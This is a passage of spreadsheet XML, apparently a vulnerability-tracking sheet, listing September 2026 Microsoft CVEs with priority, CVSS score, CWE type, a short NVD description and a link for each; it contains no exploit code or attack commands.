    </row>
    <row r="1252">
      <c r="A1252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69357</t>
        </is>
      </c>
      <c r="D1252" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1252" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1252" s="5" t="inlineStr"/>
      <c r="H1252" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1252" s="5" t="inlineStr"/>
      <c r="J1252" s="5" t="inlineStr"/>
      <c r="K1252" s="5" t="inlineStr"/>
      <c r="L1252" s="5" t="inlineStr"/>
      <c r="M1252" s="5" t="inlineStr"/>
      <c r="N1252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1252" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1252" s="5" t="inlineStr"/>
      <c r="Q1252" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1252" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69357</t>
        </is>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69358</t>
        </is>
      </c>
      <c r="D1253" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1253" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1253" s="5" t="inlineStr"/>
      <c r="H1253" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1253" s="5" t="inlineStr"/>
      <c r="J1253" s="5" t="inlineStr"/>
      <c r="K1253" s="5" t="inlineStr"/>
      <c r="L1253" s="5" t="inlineStr"/>
      <c r="M1253" s="5" t="inlineStr"/>
      <c r="N1253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1253" s="5" t="inlineStr"/>
      <c r="Q1253" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R1253" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Remote Desktop Client allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69358</t>
        </is>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69364</t>
        </is>
      </c>
      <c r="D1254" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1254" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1254" s="5" t="inlineStr"/>
      <c r="H1254" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1254" s="5" t="inlineStr"/>
      <c r="J1254" s="5" t="inlineStr"/>
      <c r="K1254" s="5" t="inlineStr"/>
      <c r="L1254" s="5" t="inlineStr"/>
      <c r="M1254" s="5" t="inlineStr"/>
      <c r="N1254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1254" s="5" t="inlineStr"/>
      <c r="Q1254" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="R1254" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69364</t>
        </is>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69366</t>
        </is>
      </c>
      <c r="D1255" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1255" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1255" s="5" t="inlineStr"/>
      <c r="H1255" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1255" s="5" t="inlineStr"/>
      <c r="J1255" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K125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55" s="5" t="inlineStr"/>
      <c r="M1255" s="5" t="inlineStr"/>
      <c r="N1255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1255" s="5" t="inlineStr"/>
      <c r="Q1255" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1255" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69366</t>
        </is>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69384</t>
        </is>
      </c>
      <c r="D1256" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1256" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1256" s="5" t="inlineStr"/>
      <c r="H1256" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1256" s="5" t="inlineStr"/>
      <c r="J1256" s="5" t="inlineStr"/>
      <c r="K1256" s="5" t="inlineStr"/>
      <c r="L1256" s="5" t="inlineStr"/>
      <c r="M1256" s="5" t="inlineStr"/>
      <c r="N1256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1256" s="5" t="inlineStr"/>
      <c r="Q1256" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R1256" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Virtual Hard Disk (VHD) Miniport Driver allows an unauthorized attacker to deny service locally.</t>
        </is>
      </c>
      <c r="S1256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69384</t>
        </is>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69396</t>
        </is>
      </c>
      <c r="D1257" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1257" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1257" s="5" t="inlineStr"/>
      <c r="H1257" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1257" s="5" t="inlineStr"/>
      <c r="J1257" s="5" t="inlineStr"/>
      <c r="K1257" s="5" t="inlineStr"/>
      <c r="L1257" s="5" t="inlineStr"/>
      <c r="M1257" s="5" t="inlineStr"/>
      <c r="N1257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1257" s="5" t="inlineStr"/>
      <c r="Q1257" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1257" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NDIS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69396</t>
        </is>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69451</t>
        </is>
      </c>
      <c r="D1258" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1258" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1258" s="5" t="inlineStr"/>
      <c r="H1258" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1258" s="5" t="inlineStr"/>
      <c r="J1258" s="5" t="inlineStr"/>
      <c r="K1258" s="5" t="inlineStr"/>
      <c r="L1258" s="5" t="inlineStr"/>
      <c r="M1258" s="5" t="inlineStr"/>
      <c r="N1258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1258" s="5" t="inlineStr"/>
      <c r="Q1258" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1258" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Management Instrumentation allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69451</t>
        </is>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69460</t>
        </is>
      </c>
      <c r="D1259" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1259" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1259" s="5" t="inlineStr"/>
      <c r="H1259" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1259" s="5" t="inlineStr"/>
      <c r="J1259" s="5" t="inlineStr"/>
      <c r="K1259" s="5" t="inlineStr"/>
      <c r="L1259" s="5" t="inlineStr"/>
      <c r="M1259" s="5" t="inlineStr"/>
      <c r="N1259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1259" s="5" t="inlineStr"/>
      <c r="Q1259" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1259" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Modern Device Management (MDM) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69460</t>
        </is>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69482</t>
        </is>
      </c>
      <c r="D1260" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1260" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1260" s="5" t="inlineStr"/>
      <c r="H1260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1260" s="5" t="inlineStr"/>
      <c r="J1260" s="5" t="inlineStr"/>
      <c r="K1260" s="5" t="inlineStr"/>
      <c r="L1260" s="5" t="inlineStr"/>
      <c r="M1260" s="5" t="inlineStr"/>
      <c r="N1260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1260" s="5" t="inlineStr"/>
      <c r="Q1260" s="5" t="inlineStr">
        <is>
          <t>CWE-379</t>
        </is>
      </c>
      <c r="R1260" s="5" t="inlineStr">
        <is>
          <t>Creation of temporary file in directory with insecure permissions in Windows Error Reporting allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="S1260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69482</t>
        </is>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69536</t>
        </is>
      </c>
      <c r="D1261" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1261" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1261" s="5" t="inlineStr"/>
      <c r="H1261" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1261" s="5" t="inlineStr"/>
      <c r="J1261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1261" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1261" s="5" t="inlineStr"/>
      <c r="M1261" s="5" t="inlineStr"/>
      <c r="N1261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1261" s="5" t="inlineStr"/>
      <c r="Q1261" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1261" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S1261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69536</t>
        </is>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69553</t>
        </is>
      </c>
      <c r="D1262" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1262" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1262" s="5" t="inlineStr"/>
      <c r="H1262" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1262" s="5" t="inlineStr"/>
      <c r="J1262" s="5" t="inlineStr"/>
      <c r="K1262" s="5" t="inlineStr"/>
      <c r="L1262" s="5" t="inlineStr"/>
      <c r="M1262" s="5" t="inlineStr"/>
      <c r="N1262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1262" s="5" t="inlineStr"/>
      <c r="Q1262" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1262" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Hyper-V allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69553</t>
        </is>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69597</t>
        </is>
      </c>
      <c r="D1263" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1263" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1263" s="5" t="inlineStr"/>
      <c r="H1263" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1263" s="5" t="inlineStr"/>
      <c r="J1263" s="5" t="inlineStr"/>
      <c r="K1263" s="5" t="inlineStr"/>
      <c r="L1263" s="5" t="inlineStr"/>
      <c r="M1263" s="5" t="inlineStr"/>
      <c r="N1263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1263" s="5" t="inlineStr"/>
      <c r="Q1263" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1263" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows HTTP.sys allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69597</t>
        </is>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69602</t>
        </is>
      </c>
      <c r="D1264" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1264" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1264" s="5" t="inlineStr"/>
      <c r="H1264" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1264" s="5" t="inlineStr"/>
      <c r="J1264" s="5" t="inlineStr"/>
      <c r="K1264" s="5" t="inlineStr"/>
      <c r="L1264" s="5" t="inlineStr"/>
      <c r="M1264" s="5" t="inlineStr"/>
      <c r="N1264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1264" s="5" t="inlineStr"/>
      <c r="Q1264" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1264" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows PrintWorkflowUserSvc allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69602</t>
        </is>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69688</t>
        </is>
      </c>
      <c r="D1265" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1265" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1265" s="5" t="inlineStr"/>
      <c r="H1265" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1265" s="5" t="inlineStr"/>
      <c r="J1265" s="5" t="inlineStr"/>
      <c r="K1265" s="5" t="inlineStr"/>
      <c r="L1265" s="5" t="inlineStr"/>
      <c r="M1265" s="5" t="inlineStr"/>
      <c r="N1265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1265" s="5" t="inlineStr"/>
      <c r="Q1265" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R1265" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69688</t>
        </is>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69706</t>
        </is>
      </c>
      <c r="D1266" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1266" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1266" s="5" t="inlineStr"/>
      <c r="H1266" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1266" s="5" t="inlineStr"/>
      <c r="J1266" s="5" t="inlineStr"/>
      <c r="K1266" s="5" t="inlineStr"/>
      <c r="L1266" s="5" t="inlineStr"/>
      <c r="M1266" s="5" t="inlineStr"/>
      <c r="N1266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1266" s="5" t="inlineStr"/>
      <c r="Q1266" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1266" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69706</t>
        </is>
      </c>
    </row>
    <row r="1267">
      <c r="A1267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69757</t>
        </is>
      </c>
      <c r="D1267" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1267" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1267" s="5" t="inlineStr"/>
      <c r="H1267" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I1267" s="5" t="inlineStr"/>
      <c r="J1267" s="5" t="inlineStr"/>
      <c r="K1267" s="5" t="inlineStr"/>
      <c r="L1267" s="5" t="inlineStr"/>
      <c r="M1267" s="5" t="inlineStr"/>
      <c r="N1267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1267" s="5" t="inlineStr"/>
      <c r="Q1267" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1267" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69757</t>
        </is>
      </c>
    </row>
    <row r="1268">
      <c r="A1268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69761</t>
        </is>
      </c>
      <c r="D1268" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1268" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1268" s="5" t="inlineStr"/>
      <c r="H1268" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1268" s="5" t="inlineStr"/>
      <c r="J1268" s="5" t="inlineStr"/>
      <c r="K1268" s="5" t="inlineStr"/>
      <c r="L1268" s="5" t="inlineStr"/>
      <c r="M1268" s="5" t="inlineStr"/>
      <c r="N1268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1268" s="5" t="inlineStr"/>
      <c r="Q1268" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1268" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t>
        </is>
      </c>
    </row>
    <row r="1269">
      <c r="A1269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69775</t>
        </is>
      </c>
      <c r="D1269" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1269" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1269" s="5" t="inlineStr"/>
      <c r="H1269" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1269" s="5" t="inlineStr"/>
      <c r="J1269" s="5" t="inlineStr"/>
      <c r="K1269" s="5" t="inlineStr"/>
      <c r="L1269" s="5" t="inlineStr"/>
      <c r="M1269" s="5" t="inlineStr"/>
      <c r="N1269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1269" s="5" t="inlineStr"/>
      <c r="Q1269" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1269" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S1269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t>
        </is>
      </c>
    </row>
    <row r="1270">
      <c r="A1270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1270" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71415</t>
        </is>
      </c>
      <c r="D1270" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E1270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
